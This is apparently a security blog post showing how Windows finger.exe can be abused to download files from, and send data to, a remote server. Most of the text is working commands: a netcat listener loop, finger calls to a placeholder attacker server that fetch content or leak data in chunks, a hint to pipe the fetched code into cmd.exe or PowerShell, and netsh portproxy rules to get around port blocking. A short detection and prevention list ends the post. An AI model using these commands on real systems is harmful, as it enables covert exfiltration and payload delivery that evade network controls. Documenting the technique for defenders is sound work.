finger.exe can be abused to transfer data to and from hosts. Finger is an old protocol which does not seem to get used much anymore. For reasons unknown to me, Windows supplies a finger client.
The Finger protocol is defined in RFC 1288.
First you will need to set up a makeshift finger server to serve a file. I did this with a sleazy while loop and netcat:
while [ 1 ]; do nc -q 0 -nlvp 79 < FILENAME_GOES_HERE; done
Next, on Windows, you can download this with
finger.exe in PowerShell
finger @YOUR_FINGER_SERVER|Select -Skip 2 > outfile.txt
finger @YOUR_FINGER_SERVER |more +2 >out.txt
This could easily use this technique to serve code to pipe into cmd.exe or PowerShell.
Specifying a user with
finger.exe allows you to exfiltrate data several bytes at a time. In my tests on Windows 10, I was able to send a little over 8000 bytes at a time.
Writing a script to chunk and encode a file, and send it to a server would not be too hard to do. Here is a quick proof of concept:
On the server:
touch empty while [ 1 ]; do nc -q 0 -nlvp 79 < empty >> outfile
From Windows host:
finger "a string here"@YOUR_FINGER_SERVER finger lotsofbyteshere@YOUR_FINGER_SERVER ...snip... finger part1000of1000@YOUR_FINGER_SERVER
After you are done sending data, hit Control-C to kill the netcat listener loop, and
outfile will contain everything received during the duration of the loop running.
DarkFinger-C2 is a more polished example of this technique, which I discovered while writing this post.
Dealing with Firewalls
finger utilizes port 79 which may be blocked. You can get around this with
netsh portproxy and changing the port your finger server listens on. In this example, we have changed it to 8080
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=79 connectaddress=YOUR_FINGER_SERVER_IP connectport=8080 netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=8080 connectaddress=127.0.0.1 connectport=79
Now, you can finger localhost and the traffic is relayed to your server on port 8080:
finger "exfil data here"@127.0.0.1
When you are done, remove the netsh rules:
netsh interface portproxy delete v4tov4 listenport=79 listenaddress=127.0.0.1 netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=127.0.0.1
Detection and Prevention
Here are some ideas of how to detect and prevent this technique:
- Restrict traffic for TCP port 79.
- Monitor for use of finger.exe.
- Presence of C:\Windows\Prefetch\finger*.pf indicates that finger.exe has executed on a host.
- Set restrictive permissions to execute finger.exe or consider removing it if you are not using it.